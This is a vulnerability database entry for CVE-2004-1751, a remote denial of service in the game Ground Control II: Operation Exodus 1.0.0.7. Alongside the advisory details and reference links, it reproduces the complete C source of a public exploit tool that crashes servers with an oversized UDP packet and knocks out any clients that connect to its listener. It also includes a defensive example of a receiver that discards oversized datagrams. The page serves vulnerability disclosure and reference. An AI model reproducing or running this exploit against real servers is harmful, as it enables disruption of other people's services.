CVE-2004-1751
CVSS5.0
Published: 2004-08-26 00:00:00
Revised: 2016-10-17 23:00:27
NMCOE    

[Original] Ground Control II: Operation Exodus 1.0.0.7 and earlier allows remote servers to cause a denial of service (client or server crash) via a large packet, which generates a "Message too long" socket error that is treated as a critical error.


[CNNVD] Massive Entertainment Ground Control II Remote Denial of Service Vulnerability (CNNVD-200408-223)

Ground Control II: Operation Exodus 1.0.0.7 and earlier versions contain a vulnerability. A remote server can cause a denial of service (client or server crash) by means of an oversized packet, which generates a "Message too long" socket error that the game treats as a critical error.

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1751
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1751
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-223
(Official data source) CNNVD

- Other Links and Resources

http://aluigi.altervista.org/adv/gc2boom-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/gc2boom-adv.txt
http://marc.info/?l=bugtraq&m=109357154602892&w=2
(UNKNOWN)  BUGTRAQ  20040826 Broadcast forced exit in Ground Control II 1.0.0.7
http://securitytracker.com/id?1011075
(VENDOR_ADVISORY)  SECTRACK  1011075
http://www.securityfocus.com/bid/11058
(VENDOR_ADVISORY)  BID  11058
http://xforce.iss.net/xforce/xfdb/17130
(VENDOR_ADVISORY)  XF  ground-control-dos(17130)

- Vulnerability Information

Massive Entertainment Ground Control II Remote Denial of Service Vulnerability
Medium Other
2004-08-26 00:00:00 2005-10-20 00:00:00
Remote
Ground Control II: Operation Exodus 1.0.0.7 and earlier versions contain a vulnerability. A remote server can cause a denial of service (client or server crash) by means of an oversized packet, which generates a "Message too long" socket error that the game treats as a critical error.

- Advisories and Patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (429)

Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit (EDBID:429)
windows dos
2004-08-31 Verified
0 Luigi Auriemma
N/A
/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
 #include <winsock.h>
 #include "winerr.h"

 #define close closesocket
 #define ONESEC 1000
#else
 #include <unistd.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <arpa/inet.h>
 #include <netdb.h>

 #define ONESEC 1
#endif

#define VER "0.1"
#define PORT 42001
#define BUFFSZ 2048
#define BOOMSZ 1024 // 513 is enough
#define TIMEOUT 3
#define INFO "\x58\x00\x00\x00" /* build */ \
       "\x52\x00" /* protocol */ \
       "\x0a\x00\x00" /* gameinfo */
       /* this packet is not important, you can also use random data */

void show_gc2info(u_char *data, int len);
void unicode2char(u_char *data, int len);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
 struct sockaddr_in peer;
 int sd,
     len,
     psz,
     on = 1,
     type,
     doubt = 0;
 u_short port = PORT;
 u_char buff[BUFFSZ];

 setbuf(stdout, NULL);

 fputs("\n"
   "Ground Control <= 1.0.0.7 server/client crash "VER"\n"
   "by Luigi Auriemma\n"
   "e-mail: aluigi@altervista.org\n"
   "web: http://aluigi.altervista.org\n"
   "\n", stdout);

 if(argc < 2) {
   printf("\nUsage: %s <attack> [port(%d)]\n"
     "\n"
     "Attack:\n"
     " c = broadcast clients crash\n"
     " s = server crash (can be also directly used versus a client)\n"
     " You must add the IP or the hostname of the server after the 's'.\n"
     "\n"
     "Some usage examples:\n"
     " gc2boom c listens on port %d for clients\n"
     " gc2boom c 1234 listens on port 1234\n"
     " gc2boom s 192.168.0.1 tests the server 192.168.0.1 on port %d\n"
     " gc2boom s codserver 1234 tests the server codserver on port 1234\n"
     "\n", argv[0], PORT, PORT, PORT);
   exit(1);
 }

#ifdef WIN32
 WSADATA wsadata;
 WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

 type = argv[1][0];
 if(type == 's') {
   if(!argv[2]) {
     fputs("\n"
       "Error: you must specify the server IP or hostname.\n"
       " Example: gc2boom s localhost\n"
       "\n", stdout);
     exit(1);
   }
   peer.sin_addr.s_addr = resolv(argv[2]);
   if(argc > 3) port = atoi(argv[3]);
   printf("\n- Target %s:%hu\n\n",
     inet_ntoa(peer.sin_addr),
     port);
 } else if(type == 'c') {
   peer.sin_addr.s_addr = INADDR_ANY;
   if(argc > 2) port = atoi(argv[2]);
   printf("\n- Listening on port %d\n", port);
 } else {
   fputs("\n"
     "Error: Wrong type of attack.\n"
     " You can choose between 2 types of attacks, versus clients with 'c' or\n"
     " versus servers with 's'\n"
     "\n", stdout);
   exit(1);
 }

 peer.sin_port = htons(port);
 peer.sin_family = AF_INET;
 psz = sizeof(peer);

 sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 if(sd < 0) std_err();

 if(type == 's') {
   fputs("- Request informations\n", stdout);
   if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();
   if(timeout(sd) < 0) {
     fputs("\n"
       "Alert: socket timeout, probably the server is not online or the port you have\n"
       " choosen is not exact.\n"
       " Check the \"unreliableport\" value in the server's informations.\n"
       " This tool now continue the attack\n", stdout);
       doubt = 1;
   } else {
     len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
     if(len < 0) std_err();
     show_gc2info(buff, len);
   }

   memset(buff, 0x00, BOOMSZ);
   fputs("- Send BOOM packet\n", stdout);
   if(sendto(sd, buff, BOOMSZ, 0, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();

   fputs("- Wait one second for an exact check\n", stdout);
   sleep(ONESEC);

   fputs("- Check if server is vulnerable\n", stdout);
   if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();
   if(doubt) {
     fputs("\nI can't say if the host is vulnerable, check it manually\n\n", stdout);
   } else {
     if(timeout(sd) < 0) {
       fputs("\nServer IS vulnerable!!!\n\n", stdout);
     } else {
       fputs("\nServer doesn't seem vulnerable\n\n", stdout);
     }
   }
 } else {
   if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
    < 0) std_err();
   if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();
   fputs("Clients:\n", stdout);
   while(1) {
     /* leave one byte free so the terminator below cannot write past buff */
     len = recvfrom(sd, buff, BUFFSZ - 1, 0, (struct sockaddr *)&peer, &psz);
     if(len < 0) std_err();
     buff[len] = 0x00;

     printf("%16s:%hu -> %s\n",
       inet_ntoa(peer.sin_addr),
       ntohs(peer.sin_port),
       buff);

     memset(buff, 0x00, BOOMSZ);
     if(sendto(sd, buff, BOOMSZ, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
   }
 }

 close(sd);
 return(0);
}

void show_gc2info(u_char *data, int len) {
 u_char *ptr;
 int cp;

 printf("\n Build: %d", *(u_short *)data);
 printf("\n Protocol: %d", *(u_short *)(data + 4));
 printf("\n Gameinfo: %d", *(u_short *)(data + 6));
 ptr = data + 9;
 fputs("\n Server name: ", stdout);
 unicode2char(ptr + 1, *ptr);
 fwrite(ptr + 1, 1, *ptr, stdout);
 ptr += (*ptr << 1) + 1;
 fputs("\n Map: ", stdout);
 ptr += fwrite(ptr + 1, 1, *ptr, stdout) + 1;
 fputs("\n External IP: ", stdout);
 ptr += fwrite(ptr + 1, 1, *ptr, stdout) + 1;
 ptr += 4;
 cp = *ptr++;
 printf("\n Current players: %d", cp);
 printf("\n Max players: %d", *ptr++);
 printf("\n ???: %s", *ptr++ ? "true" : "false");
 printf("\n Dedicated: %s", *ptr++ ? "true" : "false");
 printf("\n Password: %s", *ptr++ ? "true" : "false");
 ptr += 5;
 while(cp--) {
   fputs("\n Player: ", stdout);
   unicode2char(ptr + 1, *ptr);
   fwrite(ptr + 1, 1, *ptr, stdout);
   ptr += (*ptr << 1) + 1 + 6;
 }
 fputs("\n\n", stdout);
}

void unicode2char(u_char *data, int len) {
 u_char *out = data;

 while(len--) {
   *out++ = *data++;
   data++;
 }
}

int timeout(int sock) {
 struct timeval tout;
 fd_set fd_read;
 int err;

 tout.tv_sec = TIMEOUT;
 tout.tv_usec = 0;
 FD_ZERO(&fd_read);
 FD_SET(sock, &fd_read);
 err = select(sock + 1, &fd_read, NULL, NULL, &tout);
 if(err < 0) std_err();
 if(!err) return(-1);
 return(0);
}

u_long resolv(char *host) {
 struct hostent *hp;
 u_long host_ip;

 host_ip = inet_addr(host);
 if(host_ip == INADDR_NONE) {
   hp = gethostbyname(host);
   if(!hp) {
     printf("\nError: Unable to resolve hostname (%s)\n", host);
     exit(1);
   } else host_ip = *(u_long *)(hp->h_addr);
 }
 return(host_ip);
}

#ifndef WIN32
 void std_err(void) {
   perror("\nError");
   exit(1);
 }
#endif

// milw0rm.com [2004-08-31]

- Vulnerability Information

9272
Ground Control II Client/Server Large Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

GroundControl contains a flaw that may allow a remote denial of service. The issue is triggered when the client or server receives a packet bigger than 512 bytes, and will result in loss of availability for the GroundControl server.
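The defensive counterpart of the bug described here and in the original summary above, as an added example that is not part of this record or of the game's code: a bounded datagram receiver that drops an oversized packet and keeps serving, instead of treating the resulting condition (on Windows, recvfrom() failing with WSAEMSGSIZE, "Message too long") as a fatal error. It assumes Linux (MSG_TRUNC makes recv() report the real datagram length) and a constructed 512-byte protocol limit; the sample datagrams are constructed inline.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

#define MAX_PKT 512          /* assumed: largest datagram the protocol legitimately uses */
#define PKT_OVERSIZED (-2)   /* recv_bounded() result: datagram exceeded buffer, was dropped */

/* Receive one datagram into buf (cap bytes). An oversized datagram is
 * consumed and reported as PKT_OVERSIZED rather than escalated to a fatal
 * error. Linux-specific: with MSG_TRUNC, recv() returns the real datagram
 * length even when it exceeds the buffer; the kernel discards the excess. */
ssize_t recv_bounded(int sock, unsigned char *buf, size_t cap) {
    ssize_t n = recv(sock, buf, cap, MSG_TRUNC);
    if (n < 0) return -1;                       /* genuine socket error */
    if ((size_t)n > cap) return PKT_OVERSIZED;  /* truncated: drop it, keep running */
    return n;
}

/* Demo over a UNIX datagram socketpair (constructed input, no network):
 * a 1024-byte all-zero "boom" datagram followed by a 100-byte valid one.
 * Returns how many datagrams were dropped as oversized and stores the
 * valid datagram's length in *good_len; -1 if the socketpair fails. */
int demo_survives_boom(size_t *good_len) {
    int sv[2], i, dropped = 0;
    unsigned char boom[1024], good[100], buf[MAX_PKT];

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return -1;
    memset(boom, 0x00, sizeof boom);
    memset(good, 'A', sizeof good);
    send(sv[0], boom, sizeof boom, 0);
    send(sv[0], good, sizeof good, 0);

    *good_len = 0;
    for (i = 0; i < 2; i++) {
        ssize_t n = recv_bounded(sv[1], buf, sizeof buf);
        if (n == PKT_OVERSIZED) dropped++;       /* the oversized packet: survived */
        else if (n > 0) *good_len = (size_t)n;   /* the valid packet: still readable */
    }
    close(sv[0]);
    close(sv[1]);
    return dropped;                              /* 1 for the inputs above */
}

int main(void) {
    size_t len = 0;
    int dropped = demo_survives_boom(&len);
    printf("dropped oversized: %d, valid datagram length: %zu\n", dropped, len);
    return (dropped == 1 && len == 100) ? 0 : 1;
}
```

On Windows the same policy applies: a WSAEMSGSIZE result from recvfrom() means the datagram was truncated into the buffer and should be discarded, not treated as a critical error.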

- Timeline

2004-08-26 Unknown
2004-08-26 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Luigi Auriemma has released an unofficial patch to address this vulnerability.

- Related References

- Vulnerability Author
